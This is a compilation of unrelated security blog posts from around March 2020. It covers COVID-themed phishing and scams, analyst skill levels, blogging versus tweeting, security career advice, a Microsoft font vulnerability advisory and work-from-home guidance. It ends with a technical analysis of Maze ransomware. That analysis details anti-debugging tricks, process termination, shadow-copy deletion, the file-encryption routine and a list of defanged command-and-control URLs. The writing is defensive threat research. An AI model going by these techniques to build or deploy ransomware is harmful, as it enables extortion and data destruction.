Individuals at financial services organizations in the United States were sent emails with the subject line “Internal Guidance for Businesses Grant and loans in response to respond to COVID-19” (Figure 4). These emails had OpenDocument Presentation (.ODP) format attachments that, when opened in Microsoft PowerPoint or OpenOffice Impress, display a U.S. Small Business Administration (SBA) themed message (Figure 5) and an in-line link that redirects to an Office 365 phishing kit (Figure 6) hosted at https://tyuy56df-kind-giraffe-ok.mybluemix[.]net/.


Figure 4: Email lure referencing business grants and loans


Figure 5: SBA-themed message


Figure 6: Office 365 phishing page

Implications

Malicious actors have always exploited users’ sense of urgency, fear, goodwill and mistrust to enhance their operations. The threat actors exploiting this crisis are not new, they are simply taking advantage of a particularly overtaxed target set that is urgently seeking new information. Users who are aware of this dynamic, and who approach any new information with cautious skepticism will be especially prepared to meet this challenge.

Skill Levels in Digital Security


Two posts in one day? These are certainly unusual times.

I was thinking about words to describe different skill levels in digital security. Rather than invent something, I decided to review terms that have established meaning. Thanks to Google Books I found this article in a 1922 edition of the Archives of Psychology that mentioned four key terms:

  1. The novice is a (person) who has no trade ability whatever, or at least none that could not be paralleled by practically any intelligent (person).
  2. An apprentice has acquired some of the elements of the trade but is not sufficiently skilled to be trusted with any important task.
  3. The journey(person) is qualified to perform almost any work done by members of the trade.
  4. An expert can perform quickly and with superior skill any work done by (people) in the trade.
I believe these four categories can apply to some degree to the needs of the digital security profession.

At GE-CIRT we had three levels -- event analyst, incident analyst, and incident handler. We did not hire novices, so those three roles map in some ways to apprentice, journeyperson, and expert. 

One difference with the classical description applies to how we worked with apprentices. We trusted apprentices, or event analysts, with specific tasks. We thought of this work as important, just as every role on a team is important. It may not have been leading an incident response, but without the work of the event and incident analysts, we may not have discovered many incidents!

Crucially, we encouraged event analysts, and incident analysts for that matter, to always be looking to exceed the parameters of their assigned duties.

However, we stipulated that if a person was working beyond their assigned duties, they had to have their work product reviewed by the next level of analysis. This enabled mentoring among the various groups. It also helped identify people who were candidates for promotion. If a person consistently worked beyond their assigned duties, and eventually reached a near-perfect or perfect ability to do that work, that proved he or she was ready to assume the next level.

This ability to access work beyond assigned duties is one reason I have problems with limiting data by role. I think everyone who works in a CIRT should have access to all of the data, assuming there are no classification, privacy, or active investigation constraints.

One of my laws is the following:

Analysts are good because they have good data. An expert with bad data is helpless. An apprentice with good data has a chance to do good work.

I've said it more eloquently elsewhere but this is the main point. 

For more information on the apprenticeship model, this article might be useful.

March Hackness 2020 Post Game Report

There’s no better way to put it - March Hackness 2020 was a slam dunk! The CMD+CTRL Cyber Range community shattered records of our previous quarterly events including most participants, most points scored, fastest time to solve all challenges (under 2 hours!) and many more. Many thanks to everyone that participated for choosing to spend three days with us!

More importantly, with the outstanding turnout we have lots of stats to share. Our favorites include this being the first million point event, our profiled hacker (ElleF) showing her All-Star skills and the mid-event launch of our free community site! Now on with the event wrap up:

When You Should Blog and When You Should Tweet


I saw my like-minded, friend-that-I've-never-met Andrew Thompson Tweet a poll, posted above.

I was about to reply with the following Tweet:

"If I'm struggling to figure out how to capture a thought in just 1 Tweet, that's a sign that a blog post might be appropriate. I only use a thread, and no more than 2, and hardly ever 3 (good Lord), when I know I've got nothing more to say. "1/10," "1/n," etc. are not for me."

Then I realized I had something more to say, namely, other reasons blog posts are better than Tweets. For the briefest moment I considered adding a second Tweet, making, horror of horrors, a THREAD, and then I realized I would be breaking my own guidance.

Here are three reasons to consider blogging over Tweeting.

1. If you find yourself trying to pack your thoughts into a 280 character limit, then you should write a blog post. You might have a good idea, and instead of expressing it properly, you're falling into the trap of letting the medium define the message, aka the PowerPoint trap. I learned this from Edward Tufte: let the message define the medium, not the other way around.

2. Twitter threads lose the elegance and readability of the English language as our ancestors created it, for our benefit. They gave us structures, like sentences, lists, indentation, paragraphs, chapters, and so on. What does Twitter provide? 280 character chunks. Sure, you can apply feeble "1/n" annotations, but you've lost all that structure and readability, and for what?

3. In the event you're writing a Tweet thread that's really worth reading, writing it via Twitter virtually guarantees that it's lost to history. Twitter is an abomination for citation, search, and future reference. In the hierarchy of delivering content for current researchers and future generations, the hierarchy is the following, from lowest to highest:

  • "Transient," "bite-sized" social media, e.g., Twitter, Instagram, Facebook, etc. posts
  • Blog posts
  • Whitepapers
  • Academic papers in "electronic" journals
  • Electronic (e.g., Kindle) only formatted books
  • Print books (that may be stand-alone works, or which may contain journal articles)

Print book are the apex communication medium because we have such references going back hundreds of years. Hundreds of years from now, I doubt the first five formats above will be easily accessible, or accessible at all. However, in a library or personal collection somewhere, printed books will endure.

The bottom line is that if you think what you're writing is important enough to start a "1/n" Tweet thread, you've already demonstrated that Twitter is the wrong medium.

The natural follow-on might be: what is Twitter good for? Here are my suggestions:

  • Announcing a link to another, in-depth news resource, like a news article, blog post, whitepaper, etc.
  • Offering a comment on an in-depth news resource, or replying to another person's announcement.
  • Asking a poll question.
  • Asking for help on a topic.
  • Engaging in a short exchange with another user. Long exchanges on hot topics typically devolve into a confusing mess of messages and replies, that delivery of which Twitter has never really managed to figure out.

I understand the seduction of Twitter. I use it every day. However, when it really matters, blogging is preferable, followed by the other media I listed in point 3 above.

Update 0930 ET 27 Mar 2020: I forgot to mention that in extenuating circumstances, like live-Tweeting an emergency, Twitter threads on significant matters are fine because the urgency of the situation and the convenience or plain logistical limitations of the situation make Twitter indispensable. I'm less thrilled by live-Tweeting in conferences, although I'm guilty of it in the past. I'd prefer a thoughtful wrap-up post following the event, which I did a lot before Twitter became popular.

How to start your career in cyber security

The cyber security industry is booming. Organisations are increasingly using technological solutions to perform core functions, and they need a way to make sure these processes aren’t vulnerable to cyber attackers.

This influx in opportunities is outpacing the number of qualified personnel, meaning now is an ideal time to get into an industry that promises generous salaries and opportunities for career progression.

Let’s take a look at four ways you can get started in the cyber security industry.


1) Identify your transferable skills

Unlike many professions, you don’t need cyber security experience to get into the field, although many people entering the field will come from jobs that have similar skillsets, such as systems administration or information analysis.

If you can demonstrate the relevance of your existing experience – what recruiters call ‘transferable skills’ – there’s no reason why you can’t get a foothold on the cyber security career ladder.

There are also plenty of entry-level positions available. Account executives and junior penetration testers, for example, tend to have little work experience, and can learn while on the job.

Of course, any prior experience is a massive advantage, so it’s worth taking an internship or volunteer position if you can. Alternatively, you could offer to help your employer or academic institution’s IT department in your spare time.

Kick-start your cyber security career with our Certified Cyber Security Foundation Training Course >> 


2) There are lots of free ways you can learn about the industry

It’s always a good idea to read as much as you can about a subject to find out what you’re getting yourself into. There are plenty of blogs dedicated to the practicalities of the cyber security industry; two good ones to start with are Troy Hunt’s and Brian Krebs’.

And, of course, there’s our own blog, which helps you stay up to date with the latest cyber security news and advice.

You should also consider following industry professionals on Twitter, as many of them provide useful tips, engage in debates and answer questions.

Download your free cyber security careers guide >>


3) Get industry connections

Meeting people and making connections is a great way to get your foot in the door. Networking websites such as LinkedIn can be helpful, but you should definitely take any opportunity to get face-to-face meetings.

Conferences are an excellent starting point. There are tons of events across the UK each year, where you can listen to keynote presentations, take part in roundtables and workshops, and network.

You should also get to know the cyber security professionals in your organisation. We’re not suggesting that you accost them during their lunch break, but a few well-timed questions could lead to essential advice.

More to the point, simply getting to know them on a personal level could give you an advantage when a job opens up in the department.


4) Gain a qualification

The best way to gain an advantage over other prospective cyber security professionals is to become qualified.

The qualifications you need will depend on your career path. If you don’t have this mapped out yet, or you simply want a strong overall understanding of how to navigate security risks, you should seek out a course that covers general topics, such as our Certified Cyber Security Foundation Training Course.

This one-day course explains the fundamentals of cyber security and shows you how to protect your organisation from a range of threats.

With group discussions and practical exercises led by real-world experts, you’ll gain a true insight into the skills needed to deal with cyber threats.

 

A version of this blog was originally published on 8 December 2017.

The post How to start your career in cyber security appeared first on IT Governance UK Blog.

Weekly Update 184

Weekly Update 184

This has been an absolutely flat-out week between running almost 3 hours of our free Cyber-Broken talk with Scott Helme, doing an hour of code with Ari each day (and helping get up to speed with remote schooling) then running our Hack Yourself First workshop on Aussie time zones the last couple of days. But, especially given the current circumstances, I'm pretty happy with the result ?

This week's update covers those events plus the onboarding of the USA government onto HIBP, an announcement I was very happy to make this week! Oh - and about the green screen - I don't know whether I'll stick with this for future weekly updates or not, I'm just enjoying the novelty factor for the moment ?

Weekly Update 184
Weekly Update 184
Weekly Update 184
Weekly Update 184

References

  1. The green screen I'm using is from Elgato (this is a super cool screen, really easy to collapse and move around)
  2. Scott and I live streamed almost 3 hours of our Cyber-Broken talk which is now available to watch at your leisure (this was great fun and the feedback has been fantastic!)
  3. Ari and I did an hour of code each day working through the fundamentals for kids (I hope other parents get use out of this, particularly if their kids are stuck at home these days)
  4. The USA government is the 9th to be onboarded to Have I Been Pwned (I'm super happy to see the service extend to our friends across the Pacific!)
  5. Sponsored by Chronicle from Google. Redefining security analytics. Click here to learn about the platform designed for a world that thinks in petabytes.

Microsoft warns of vulnerabilities in Adobe Type Manager Library

The Australian Cyber Security Centre (ACSC) is aware of Microsoft’s recent disclosure of two remote code execution (RCE) vulnerabilities in the Windows Adobe Type Manager Library. Microsoft reports that there is targeted exploitation of these vulnerabilities.  The vulnerabilities affect all supported versions of Windows and Windows Server. These vulnerabilities occur when Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format. 

Scams Facing Consumers in the New Digital WFH Landscape

With many people having their normal day to day life turned upside down, scammers are capitalizing on consumers’ newfound lifestyles to make a financial gain or wreak havoc on users’ devicesLet’s take a look at the most recent threats that have emerged as a result of the pandemic 

Fraudulent Relief Checks

On Wednesday March 25, the Senate passed a relief bill that contains a substantial increase in unemployment benefits for Americans who have lost their jobs or have been furloughed due to the economic fallout from the pandemicFinancial scammers are likely to use this as an opportunity to steal money offered to Americans who are facing the negative economic effects of the pandemic, as these crooks could make consumers believe they need to pay money as a condition of receiving government relief. The Federal Trade Commission issued a warning to consumers to be on the lookout for fraudulent activity as the government implements these financial relief packages.  

Map Used to Track Pandemic Used to Spread Malware

According to security researcher Brian Krebs, criminals have started disseminating real-time, accurate information about global infection rates to spread malware. In one scheme, an interactive dashboard created by Johns Hopkins University is being used in malicious websites (and possibly in spam emails) to spread password-stealing malware.  Additionally, Krebs flagged a digital pandemic infection kit, which allows other criminals to purchase a bundled version of the map with the scammer’s preferred attack method. 

Texts, WhatsApp, and TikTok Spread Falsehoods

Due to the nature of the rapidly evolving pandemic, criminals are taking advantage of the situation by spreading misinformation. As more communities are being ordered to shelter in placemisleading text messages announcing a national quarantine claiming to come from the White House buzzed onto cell phones around the U.S. According to the Washington Post, the fraudulent text messages encouraged users to, “Stock up on whatever you guys need to make sure you have a two-week supply of everything. Please forward to your network.” These fake texts spread so widely that the White House’s National Security Council debunked the misleading claims in a Twitter post stating, “Text message rumors of a national #quarantine are FAKE. There is no national lockdown.” Communication apps like WhatsApp and social media platforms like TikTok have carried similar examples of this misinformation.  

Robocalls Offering Free Test Kits and Low-Cost Health Insurance

On top of fraudulent messages floating around via SMS, WhatsApp, and TikTok, scammers are also using robocalls to spread misinformation around the global pandemic, especially as more users are at home and available to answer phone calls as a result of self-isolation. According to CNNrobocalls from more than 60 different phone numbers are falsely offering low-priced health insurance and free coronavirus test kitsAnother type of robocall asks users to sign a petition to ban flights from China. Criminals are taking advantage of the fact that new information around the pandemic is constantly being released, presenting them with an opportunity to scam users by impersonating local and federal officials.  

Stay Safe Online With These Tips

During this time of uncertainty, it can be difficult to decipher what is fact from fiction. When it comes to the potential online threats around the recent pandemic, here’s what you can do to stay protected:  

Only trust official news sources

Be sure to only trust reputable news sites. This will help you filter out fake information that is just adding to the noise across the internet.  

Don’t share your personal or financial data

Although financial relief checks are not yet a reality, know that the federal government will not ask you to pay fees or charges upfront to receive these funds. Additionally, the government will not ask you for your Social Security number, bank account, or credit card number.  

Beware of messages from unknown users

If you receive a text, email, social media message, or phone call from an unknown user regarding the pandemic, it’s best to proceed with caution and avoid interacting with the message altogether.  

Go directly to the source

If you receive information regarding the pandemic from an unknown user, go directly to the source instead of clicking on links within messages or attachments. For example, users should only trust the map tracking the pandemic’s spread found on the Johns Hopkins websiteUsing a tool like McAfee WebAdvisor can help users stay safe from similar threats while searching the web.  

Register for the FCC’s “Do Not Call” list

This can help keep you protected from scammers looking to capitalize on current events by keeping your number off their lists. 

Stay updated 

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post Scams Facing Consumers in the New Digital WFH Landscape appeared first on McAfee Blogs.

Working from Home Cybersecurity Guidance


Working from home comes with a range of security risks, but employees need to be educated too – human behaviour is invariably the weakest link in a company’s cybersecurity posture. In the current environment, with many more employees working at home, cybercriminals are actively looking for opportunities to launch phishing attacks and compromise the IT infrastructure of businesses, large and small. 

Guidance on Working from Home All companies should start by reviewing the home working guidance available at the UK Government’s National Cyber Security Centre (NCSC). This resource helps companies prepare their employees and think about the best way to protect their systems. Crossword has been advising a number of its FTSE clients in a range of sectors, and below is a summary of the guidance given, in addition to that from the NCSC.

Run Audio and Video calls Securely

What is visible in the background of your screen during video calls and is someone monitoring who is on the call? The same is true for audio only calls. A team member should be responsible for ensuring only invited guests are present, and calls should be locked once started, so other participants cannot join.

Educate Employees on Phishing attacks
The NCSC mentions COVID-19 related Phishing attacks which use the current crisis to trick employees into clicking on fake links, downloading malware, and revealing passwords – so educate them. These could be fake HR notifications or corporate communications; fake tax credits; fake emails from mortgage providers; free meals and mechanisms for registering for them. The list is endless and cyber criminals are very news savvy and quick to adapt. Employees are likely to be more vulnerable to phishing attacks due to people rushing, fear, panic, and urgency; all the behavioural traits that result in successful phishing attacks.

Automate Virtual Personal Network configurations (VPNs) 
IT and Security teams may have a backlog of users to set up on VPNs, to provide secure connections to corporate networks. Do not allow employees to send data insecurely, use automation to make accelerated deployments and guarantee correct configuration. Even IT staff are fallible, and the combination of pressure of work volume and working fast, may leave a gaping hole in your infrastructure.

Control the use of Personal Devices for Corporate Work
Due to the rapid increase in home workers, many employees may be using their own devices to access emails and data, which may not be covered by Bring Your Own Device (BYOD) policies. What this means in practicality, is that employee’s personal devices may not be securely configured, nor managed properly and be more vulnerable. IT and Security teams again, may need to retrospectively ensure that employees are complying with BYOD policies, have appropriate endpoint security software installed etc.

Stop Personal Email and Unauthorised Cloud Storage Use
When companies are experiencing IT difficulties in setting up employees working from home, people may be tempted to use personal emails or their personal cloud to send and store data, as a work around. These are a risk and can be easy for cyber criminals to target to gain company information or distribute malware, as they are not protected by the corporate security infrastructure.

Keep Collaboration Tools Up-to-date
Tools such as Microsoft Teams, Zoom and Google Hangouts are great, but it is important to ensure all call participants are using the latest versions of the software, and that includes partners and customers that may be on calls. Employees should also only use the corporate approved tools and versions as they will have been tested by security teams for vulnerabilities, that could be exploited by cybercriminals. 

Stuart Jubb, Consulting Director at Crossword commented: “Throughout the UK, companies are doing everything they can to ensure business continues as normally as possible as the COVID-19 situation develops. The guidance we are issuing today is a summary of the key points we have been discussing with our clients across a wide range of vertical markets. Good IT security measures are arguably more important than ever as companies become a largely distributed workforce, almost overnight. As ever though, it is not just about the technology, but good behaviour and education amongst employees as cybercriminals work to exploit any vulnerability they can find, whether that be a person, mis-configured tech, or unpatched software.”

Ransomware Maze

EXECUTIVE SUMMARY

The Maze ransomware, previously known in the community as “ChaCha ransomware”, was discovered on May the 29th 2019 by Jerome Segura[1].

The main goal of the ransomware is to crypt all files that it can in an infected system and then demand a ransom to recover the files. However, the most important characteristic of Maze is the threat that the malware authors give to the victims that, if they do not pay, they will release the information on the Internet[2].

This threat has not been an idle one as the files of one company were indeed released on the Internet. Even though the company sued, the damage was already done. This is a behavior increasingly observed in new ransomware[3], such as Sodinokibi, Nemty, Clop and others.

It was highlighted last year[4] how ransomware would head in this direction to obtain money from victims who may be reluctant to pay for decryption.

TELEMETRY MAP

FIGURE 1. MAP OF MAZE INFECTIONS

INTRODUCTION

On the 29th of October a campaign distributing the Maze malware to Italian users was detected. Historically, the malware has used different techniques to gain entry, mainly using exploits kits, remote desktop connections with weak passwords or via email impersonation or, as in the Italian case, via different agencies or companies[5], i.e. the Italian Revenue Agency. These emails came with a Word attachment that was using macros to run the malware in the system.

The exploit kits used most often were Fallout and Spelevo[6].

The malware is hard programmed with some tricks to prevent reversing of it and to make static analysis more difficult. This report covers these protections and the behavior of the malware in an infected system.

The developers have inserted messages to provoke malware researchers, including the email address of Lawrence Abrams, owner of “BleepingComputer”, who they contacted directly. They are very active on social media sites such as Twitter.

McAfee protects its customers against the threats that we talk about in this report in all its products, including personal antivirus, endpoint and gateway.

MAZE OVERVIEW

The malware is a binary file of 32 bits, usually packed as an EXE or a DLL file. This report focuses on the EXE file.

FIGURE 2. INFORMATION ABOUT THE MALWARE

More information about the sample used in this report appears in this table:

TECHNICAL DETAILS

Maze is a complex piece of malware that uses some tricks to frustrate analysis right from the beginning.

The malware starts preparing some functions that appear to save memory addresses in global variables to use later in dynamic calls though it does not actually use these functions later. Whether it is residual code existing in the entry point of the malware or a trick to mislead researchers is up for debate.

FIGURE 3. SAVE ADDRESS OF FUNCTIONS TO USE LATER IN A DYNAMIC WAY

Later, the malware enters in a big block of trash code that also includes some elements to decrypt strings and important information for later. The malware uses some tricks to detect debuggers at this point.

The most important of those are:

  • A big use of the PEB field “IsDebuggerPresent”. This field is a Boolean field that is filled from Windows with 1 (True) if the application is running inside of a debugger or 0 (False) if it is not.

FIGURE 4. HIGH USE OF THE “ISDEBUGGERPRESENT” PEB FIELD TO DETERMINE IF THE APPLICATION IS RUNNING IN A DEBUGGER

If the malware detects a debugger it will remain in an infinite loop without making anything while wasting system resources.

FIGURE 5. MAZE CATCHES THE DEBUGGER AND REMAINS RUNNING, WASTING RESOURCES

The malware gets all processes in the system but ignores the first one (the ‘idle process’ in Windows which is simply a tool to let the user know what percentage of system resources are being used). Using the name of each process it makes a custom name with a custom algorithm, along with a hash that is checked against a hardcoded list. If the hash is found in this list the process will be terminated.

FIGURE 6. CHECK OF HASHES FROM CUSTOM NAME OF THE PROCESSES OF THE SYSTEM

For example, the process of the debugger “x32dbg”, is caught at this point:

FIGURE 7. X32DBG PROCESS CAUGHT BY THE MALWARE WITH THE HASH

It can terminate IDA debugger, x32dbg, OllyDbg and more processes to avoid dynamic analysis, close databases, office programs and security tools.

A partial list of the processes that can be cracked using a dictionary list terminated by the malware is shown below:

dumpcap.exe -> 0x5fb805c5
excel.exe -> 0x48780528
fiddler.exe -> 0x5e0c05b1
msaccess.exe -> 0x6a9c05ff
mysqld-nt.exe -> 0x79ec0661
outlook.exe -> 0x615605dc
pipanel.exe -> 0x5fb805c4
procexp64.exe -> 0x78020640
procexp.exe -> 0x606805d4
procmon64.exe -> 0x776e0635
procmon.exe -> 0x600005c9
python.exe -> 0x55ee0597
taskkill.exe -> 0x6c2e0614
visio.exe -> 0x49780539
winword.exe -> 0x60d805d5
x32dbg.exe -> 0x5062053b
x64dbg.exe -> 0x50dc0542

This short list shows the name of the process to kill and the custom hash from the special name generated from the original process name.

FIGURE 8. TERMINATEPROCESS FUNCTION TAKEN FROM THE EXPORT ADDRESS TABLE (EAT) OF KERNEL32 AND PASSING THE HASH NAME CHECK

The malware will kill the process with the function “TerminateProcess” that it gets from the EAT (Export Address Table) of the module “kernel32.dll” to increase obfuscation, comparing the name with a custom hash taken from the name in high caps.

FIGURE 9. CALL TO TERMINATEPROCESS IN A DYNAMIC WAY TO OBFUSCATE THIS CALL

The malware calls Windows functions in a unique way to aid obfuscation, i.e. getting the first process in the system to use the function “Process32FirstW”. However, instead of calling it directly, it puts the parameters needed for the function on the stack, followed by a memory address with a “push” opcode and then makes a direct jump to the Windows function. When the function ends, Windows makes a “ret” opcode then gets the last memory address that the malware pushed inside the stack, returning to this address and continuing the flow. An example of this can be seen in this image:

FIGURE 10. HIGH OBFUSCATION TO TRY TO SLOW ANALYSIS AND MAKE IT MORE DIFFICULT

Another ploy utilized by the malware (depending of the sample) is to get the function “DbgUIRemoteBreakin”, using the function “GetProcAddress”, before employing a trick to avoid having a debugger attach to it in runtime[7].

FIGURE 11. GET DBGUIREMOTEBREAKIN USING GETPROCADDRESS TO AVOID HAVING A DEBUGGER ATTACK IT

The trick used here is “VirtualProtect” to give the function memory address of “DbgUIRemoteBreakin” permission to write to it:

FIGURE 12. GIVE WRITE PERMISSIONS IN MEMORY

After gaining permission, which is granted only for 1 byte, the malware patches this byte with a 0xC3 value (the opcode of “ret”) and restores the previous permissions with “VirtualProtect”, again in the same address and byte, removing the write permission.

FIGURE 13. PATCH THE FUNCTION WITH A RET OPCODE AND RESTORE MEMORY PERMISSIONS

This is done to avoid having a debugger attach to it in runtime. This way, when a debugger attaches to the process internally, the system calls this function but, instead of creating a thread to start the debugging, the “ret” opcode forces the function to return without creating it. In brief, it prevents a debugger from being attached correctly. It is done before enumerating the system process.

The malware checks the language of the machine with function “GetUserDefaultUILanguage” and saves the value in the stack; it is not checked automatically after the call, but it is important later.

Maze creates a mutex with the name “Global\x” where x is a special value that is unique per machine. For example, in the next screenshot (some information has been deleted to anonymize the machine used for the analysis) is an example of this behavior. It is done to avoid two or more executions at the same time.

FIGURE 14. CREATION OF A MUTEX TO AVOID DOUBLE EXECUTION. UNIQUE PER MACHINE

The malware, after creating the mutex, makes calls to the function “GetLastError” to check against two errors:

  • 0x05 -> ERROR_ACCESS_DENIED. If the malware gets this error, it means that the mutex already exists in the system but, for some reason, the malware cannot access it (perhaps privileges, policies, etcetera).
  • 0xb7 -> ERROR_ALREADY_EXISTS. If the malware gets this error, it means that the mutex already exists in the system and can be accessed.

If either of the above occur, the malware remains in execution but does not crypt any files in the system or use any resources of the machine. It means that it will appear in the program list using 0% of the processor.

The mutex value changes either per sample or on a periodic basis to avoid the possibility of vaccines being made against it. The malware also has a command to avoid the ‘problem’ of vaccines which will be explained later.

After the mutex, the malware checks the language previously saved in the stack against, for example, language 0x419 (Russian from the Russian Federation, ru-RU[8]).

The checks are done in an obfuscated way within the jumble of the code that the malware has (in the virtual machine used here the Spanish language of Spain (es-ES) was used; it is the code 0xC0A that appears in the stack in the screenshot):

FIGURE 15. CHECKING THE LANGUAGE AGAINST THE RUSSIAN LANGUAGE FROM THE RUSSIAN FEDERATION

If the language matches any of those in the list below, the malware will clean the memory and exit the main thread without wasting any resources or making any files.

  • 0x419 -> ru-RU (Russian from Russian Federation)
  • 0x422 -> uk-UA (Ukranian from Ukraine)
  • 0x423 -> be-BY (Belarusian from Belarus)
  • 0x428 -> tg-Cyrl-TJ (Tajik (Cyrilic from Tajikistan)
  • 0x42B -> hy-AM (Armenian from Armenia)
  • 0x42C -> az-Latn-AZ (Azerbaijani (Latin from Azerbaijan))
  • 0x437 -> ka-GE (Georgian from Georgia)
  • 0x43F -> kk-KZ (Kazakh from Kazakhastan)
  • 0x440 -> ky-KG (Kyrgyz from Kyrgyzstan)
  • 0x442 -> tk-TM (Turkmen from Turkmenistan)
  • 0x443 -> uz-Latn-UZ (Uzbek (Latin from Uzbekistan))
  • 0x444 -> tt-RU (Tatar from Russia Federation)
  • 0x818 -> ro-MD (Romanian from Moldova, NOT Romanian from Romania!)
  • 0x819 -> ru-MD (Russian from Moldova)
  • 0x82C -> az-Cyrl-AZ (Azerbaijani (Cyrilic from Azerbaijan))
  • 0x843 -> uz-Cyrl-UZ (Uzbek (Cyrilic from Uzbekistan))
  • 0x7C1A -> sr (Serbian)
  • 0x6C1A -> sr-Cyrl (Serbian in Cyrilic)
  • 0x1C1A -> sr-Cyrl-BA (Serbian (Cyrilic from Bosnia and Herzegovina))
  • 0x281A -> sr-Cyrl-RS (Serbian (Cyrilic from Serbia))
  • 0x81A -> sr-Latn-CS (Serbian (Latin)) (this language code starts from Windows Vista)

The malware tries to delete the shadow volumes in the system using the “wmic.exe” program with the switches “shadowcopy” and “delete”. Prior to this, the malware gets the function of “WoW64DisableWow64FsRedirection” with “GetProcAddress” and uses it to avoid redirection by default in 64-bit operating systems and calls it in a dynamic way.

The malware tries to delete the shadow copies two times, once before crypting the files in the infected system and secondly after crypting them.

This execution is done with the function “CreateProcessW” but, to increase the level of obfuscation, the malware is launched with this command:

FIGURE 16. DELETION OF SHADOW COPIES IN THE INFECTED SYSTEM WITH THE WMIC COMMAND

As you can see in the image above, the malware uses a command with the name of folders that do not exist by default in Windows, except “Windows”, “system32” and “wbem”. It enters these folders but then promptly exits them using the command “..”, meaning it returns to the previous folder in the path.

For example, in the beginning it enters the folders “ydw” and “fdygg” but later returns to the root of the Windows installation unit with two “..” commands that lead to “C:\” in this case. It later concatenates with the “Windows” folder and continues with the same behavior to finally enter into “system32” where it calls the “wmic.exe” program with the switches to delete the shadow volumes. This is done to try obfuscating this call, though such suspicious behavior may cause an antivirus program to stop it anyway, but it is proof that the malware coders have skills in programming and a good understanding of Windows behavior.

It is important to understand that this “path” used in the command with non-existent folders is random and does not need to use the same number of folders to make the obfuscation.

After the deletion process, the malware gets the function “Wow64RevertWow64FsRedirection” using the function “GetProcAddress” and calls it in a dynamic way to leave the system in the same state as before.

FIGURE 17. RECOVER THE FS REDIRECTION IN 64-BIT OPERATING SYSTEMS

Maze affects network resources too, using the functions “WNetOpenEnumW”, “WNetEnumResourceW”, “WNetCloseEnum” and “WNetAddConnection2W”.

FIGURE 18. ENUMERATING THE NETWORK RESOURCES OF THE DISK TO CRYPT FILES INSIDE OF THEM

The malware uses two algorithms to crypt the files, ChaCha which is based on the Salsa20 algorithm that is symmetric and, for protection, an RSA algorithm that is asymmetric

In each execution the malware creates a Public BLOB of one RSA key that will be used to crypt the part that holds the information to decrypt the files, and one Private BLOB with an RSA key that allows decryption of the information crypted with the public RSA blob created previously.

FIGURE 19. EXPORT OF THE RSA PUBLIC KEY BLOB GENERATED IN RUNTIME

FIGURE 20. EXPORT OF THE RSA PRIVATE KEY BLOB GENERATED IN RUNTIME

Just like other ransomware, this malware has an RSA Public BLOB embedded that will be imported to protect the RSA private BLOB of the victim. Only the malware developers have the RSA private blob to decrypt their public RSA Blob.

FIGURE 21. IMPORT OF THE RSA PUBLIC BLOB FOR THE MALWARE DEVELOPERS

This key is protected with a crypto using a key of 32 bits and iv of 8 bytes using the function “CryptGenRandom” to avoid memory dumps but, later, it will need to be decrypted before use.

After this, the malware starts the procedure of crypting the files, searching in units, before importing the RSA public BLOB key generated in runtime. After this, it creates the ransom note prepared for this infected machine in the root folder and then starts looking for folders and files to crypt.

FIGURE 22. CREATION OF RANSOM NOTE IN ROOT FOLDER AND LOOKING FOR FOLDERS AND FILES

An example ransom note, with some data anonymized, is shown below:

FIGURE 23. EXAMPLE OF A MAZE RANSOM NOTE

The procedure to crypt the files is easy, with the malware taking the following steps:

  • Check the existence of the file with the function “SetFileAttributesW” with the attribute “FILE_ATTRIBUTE_ARCHIVE”.
  • Reserve memory to the file with a call to “Virtual Alloc” for the key and iv.
  • Open the file with read and write permissions with the function “CreateFileW” with the flag “OPEN_EXISTING”.
  • Get the file size with the function “GetFileSizeEx” (it is important for managing big files, “GetFileSize” is not good for bigger files).
  • Create a file mapping with the functions “CreateFileMappingW” and “MapViewOfFile”
  • Generate a random key of 32 bytes with the function “CryptGenRandom”.
  • Generate a random iv of 8 bytes with the function “CryptGenRandom”.
  • Reserve 264 bytes of memory with the function “VirtualAlloc”.
  • Generate a new random extension for the victim file. Each file has a different extension but does not lose the original extension; the new one is appended to the old one. For example, “1.zip” becomes “1.zip.gthf”.
  • Crypt the file with the ChaCha algorithm and the key and iv with the RSA public key generated in runtime.
  • Write this new block with the key and iv to decrypt at the end of the file.
  • Rename the file with the function “MoveFileExW”. That way it is not possible to use forensic tools to recover the files because they use the same sector on the raw disk. The malware does not delete the file using the function “DeleteFileW” and later create a new one with the crypted data. Instead, all changes are applied in the mapping directly, in memory, without using a file pointer on the disk to read and write, which makes the process much quicker.
  • The image of the file is unmapped, and handles closed.
  • The process is repeated with new files.

The list of folders that the malware avoids are:

  • Windows main directory.
  • Games
  • Tor Browser
  • ProgramData
  • cache2\entries
  • Low\Content.IE5
  • User Data\Default\Cache
  • All Users
  • Local Settings
  • AppData\Local
  • Program Files

The malware ignores these file extensions:

  • LNK
  • EXE
  • SYS
  • DLL

The malware also has a list of filenames that will not be crypted:

  • inf
  • ini
  • ini
  • dat
  • db
  • bak
  • dat.log
  • db
  • bin
  • DECRYPT-FILES.txt

However, it does crypt the file “ntuser.ini” to prevent other ransomwares from crypting it. It creates the ransom note in each folder that it can.

When the malware finishes crypting all files it changes the desktop wallpaper to this image:

FIGURE 24. THE MALWARE CHANGES THE DESKTOP WALLPAPER AFTER CRYPTING THE FILES

The malware tries to make connections to IP addresses that have been crypted in the binary to send information about the infected machine, as seen below:

 

hxxp://91.218.114.4/nwjknpeevx.action?pw=g1y652l&kyn=21y3vvhh&dvr=5e&us=g25e3582a

hxxp://91.218.114.11/forum/siaib.jspx?v=h&xyna=0vip863&eul=xsn3q0

hxxp://91.218.114.26/view/ticket/pigut.jspx?o=664quo0s&fp=ot52

hxxp://91.218.114.25/xrr.jspx?ygad=r35e2cx&e=6as6ta

hxxp://91.218.114.4/j.php

hxxp://91.218.114.11/payout/view/fa.aspx?y=y&qbx=4&kws=n2&iuy=8k7

hxxp://91.218.114.25/lxh.asp?mtxm=l7&r=836wy5

hxxp://91.218.114.26/signin/ticket/eq.action?x=yk6rr&e=50b&q=327dr5&ofk=065cdp

hxxp://91.218.114.31/signin/rnmnnekca.jsp?kdn=6snl5&e=7a50cx4hyp

hxxp://91.218.114.31/forum/a.aspx?byx=56&bc=62t0h&u=75w6n6&sot=2v0l761or6

hxxp://91.218.114.32/withdrawal/checkout/l.do?nuny=qj6&sdv=45g2boyf5q&dnr=rh8lk31ed

hxxp://91.218.114.77/task/bxfbpx.jspx?nq=cge63

hxxp://91.218.114.38/account/payout/ujwkjhoui.shtml

